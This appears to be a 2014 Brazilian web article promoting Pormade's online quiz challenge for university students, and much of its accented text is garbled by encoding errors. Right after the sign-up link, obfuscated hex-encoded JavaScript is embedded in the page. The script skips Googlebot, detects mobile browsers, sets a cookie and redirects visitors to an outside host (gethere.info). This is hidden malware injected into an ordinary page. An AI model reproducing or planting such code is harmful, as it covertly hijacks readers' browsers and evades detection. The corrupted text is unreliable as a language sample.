• Por Rafael de Oliveira Bolonha

  • Compartilhe

  • 20/05/2014

  • 10 Visualizações

Cursos em DVD

Pormade extrapola os limites da fA?brica e leva conhecimento especializado para estudantes universitA?rios

A Pormade, indA?stria do interior do ParanA? e lA�der do mercado de portas prontas no Brasil, lanA�a desafio online em forma de a�?gamea�� para universitA?rios de arquitetura, engenharia civil e design de interiores.

desafio-pormade

Por que os universitA?rios?

Este ano a Pormade inova mais uma vez e cria um projeto de educaA�A?o complementar e especializada para universitA?rios. A missA?o A� colaborar com a formaA�A?o profissional desses alunos, entregando um tipo de conteA?do que nA?o A� ministrado em sala de aula.

O a�?Desafio UniversitA?rio Pormadea�� A� cem por cento online, o que permite que alunos de qualquer parte do paA�s participem. Ele funciona como um game no qual os alunos acessam os conteA?dos que serA?o disponibilizados a cada quinze dias e respondem A�s perguntas ou “missA�es” dadas pela empresa e somam pontos. “A gente decidiu entrar no mundo online e chegar perto de uma moA�ada que estA? espalhada pelo Brasil. Distribuindo estas pA�lulas de conhecimento prA?tico sobre o que envolve a fabricaA�A?o, instalaA�A?o e manutenA�A?o de portas numa obra a gente consegue complementar os ensinamentos que o professor dA? em sala de aulaa�?, declara Beatriz Bolbuck, diretora de marketing da empresa.

E esta A� sA? a primeira das muitas aA�A�es que a empresa estA? realizando rumo A� colaboraA�A?o para a formaA�A?o profissional desses jovens que estA?o entrando no mercado de trabalho.

pormade-portas

Sobre o a�?Desafio UniversitA?rio Pormadea��

Diferente dos prA?mios e desafios convencionais dos quais esses alunos participam todos os anos, a proposta do a�?Desafio UniversitA?rio Pormadea�� A� ser algo mais focado no aprendizado e nA?o no desenvolvimento de projetos. Em cada etapa, a Pormade vai disponibilizar um conteA?do e os participantes deverA?o responder A�s perguntas referentes A�quele material. A� praticamente um “quiz”, jogo de perguntas e respostas, com conteA?do tA�cnico, A?til para quem vai trabalhar nesse mercado.

Os principais aprendizados que saem deste estudo sA?o o entendimento sobre o uso de diferentes materiais no processo de fabricaA�A?o dos produtos, os ganhos de produtividade dentro e fora do canteiro de obras e as boas prA?ticas para instalaA�A?o e manutenA�A?o de portas a fim de evitar as dores de cabeA�a na entrega destas obras.

Ao final de todos os desafios, que totalizam cinco, os cinco alunos melhor ranqueados ganharA?o prA?mios “super cools”: um iMac, um macbook air, um iPhone 5S, um iPhone 5C e um iPad.

O desafio serA? lanA�ado no dia 12 de maio e pode ser acessado atravA�s do endereA�o www.desafiopormade.com.br e acompanhado pelo Facebook, Twitter e Google+ da Pormade.

Facebook: facebook.com/pormade

Twitter: twitter.com/DesafioPormade | @desafiopormade

Google+: google.com/+pormade

pormade-portas-01A�

Sobre a Pormade

A Pormade Portas A� a maior fabricante de portas prontas do mercado, lA�der no segmento e dona de linhas de produtos criadas com muita tecnologia e inovaA�A?o. A empresa brasileira, que sempre esteve A� frente de seu tempo, busca o que ha de melhor e mais moderno para trazer para o mercado brasileiro. Imagine que na dA�cada de 80 os executivos da empresa jA? estavam visitando a fA?brica da Toyota, no JapA?o, para aprender mais sobre a Manufatura Lean, que ensinou muito para a fA?brica que hA? tempos trabalha com o modelo de administraA�A?o de produA�A?o Just In Time.

premium

A indA?stria estA? entre as melhores empresas para se trabalhar hA? treze anos consecutivos, e se orgulha em dizer que isso se deve ao fato de se preocuparem verdadeiramente com as pessoas. Seus colaboradores sA?o assistidos na saA?de, seguranA�a, bem-estar e principalmente, na educaA�A?o, que A� um dos pilares deste trabalho tA?o humanizado.

A Pormade acredita na educaA�A?o e este valor A� percebido no seu dia a dia atravA�s de inA?meras iniciativas para a formaA�A?o dos profissionais. A empresa tem sua prA?pria universidade corporativa desde 1994, oferece bolsas para diversos tipos de cursos, desde tA�cnicos atA� MBAs. E nA?o para por aA�, a indA?stria estA? investindo em inovaA�A?o e canais digitais para alcanA�ar toda a equipe de colaboradores e prestadores de serviA�os externos e para isso lanA�ou recentemente um portal de comunicaA�A?o e educaA�A?o online, que alA�m de fazer o conteA?do chegar mais rA?pido onde antes ele mal chegava, ainda otimizou uma prA?tica antiga da empresa, de recompensar seus profissionais por aprendizado.

Texto por:

Marina ProenA�a

 

A inscriA�A?o pode ser feita diretamente clicando AQUI!var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

unspecified

Sobre o Autor

  • Rafael de Oliveira Bolonha

Compartilhe este Post:

Pinterest Google+ Facebook Twitter Addthis

Envie seu comentário: